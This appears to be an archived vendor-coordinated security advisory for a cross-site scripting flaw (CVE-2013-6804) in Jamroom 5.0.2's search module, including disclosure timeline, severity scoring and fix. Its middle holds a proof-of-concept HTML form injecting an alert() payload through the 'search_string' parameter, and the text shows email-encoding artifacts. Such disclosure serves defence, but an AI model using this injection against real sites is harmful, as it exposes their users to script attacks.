看板 Bugtraq 關於我們 聯絡資訊
Advisory ID: HTB23184 Product: Jamroom Vendor: Talldude Networks, LLC Vulnerable Version(s): 5.0.2 and probably prior Tested Version: 5.0.2 Advisory Publication: November 13, 2013 [without technical details] Vendor Notification: November 13, 2013=20 Vendor Patch: November 13, 2013=20 Public Disclosure: December 4, 2013=20 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2013-6804 Risk Level: Medium=20 CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in Jamroom,= which can be exploited to perform Cross-Site Scripting (XSS) attacks. 1) Cross-Site Scripting (XSS) in Jamroom: CVE-2013-6804 The vulnerability exists due to insufficient sanitisation of user-supplied = data in "search_string" HTTP POST parameter passed to "/search/results/all/= 1/4" URL. A remote attacker can trick a logged-in user to open a specially = crafted link and execute arbitrary HTML and script code in browser in conte= xt of the vulnerable website. The exploitation example below uses the JavaScript "alert()" function to di= splay "immuniweb" word: <form action=3D"http://[host]/search/results/all/1/4" method=3D"post" name= =3D"main"> <input type=3D"hidden" name=3D"search_string" value=3D'" onmouseover=3D"ja= vascript:alert("immuniweb");'> <input type=3D"submit" id=3D"btn"> </form> ---------------------------------------------------------------------------= -------------------- Solution: Update Jamroom Search module to version 1.1.1 More Information: https://www.jamroom.net/the-jamroom-network/networkmarket/43/search/expande= d_changelog=3D1 https://www.jamroom.net/the-jamroom-network/tracker/128/xss-vulnerability-i= n-search-module ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23184 - https://www.htbridge.com/advisory/= HTB23184 - Cross-Site Scripting (XSS) in Jamroom. [2] Jamroom - http://www.jamroom.net - Jamroom is a social media platform= =2E [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types. [5] ImmuniWeb=C2=AE - http://www.htbridge.com/immuniweb/ - is High-Tech Bri= dge's proprietary web application security assessment solution with SaaS de= livery model that combines manual and automated vulnerability testing. ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.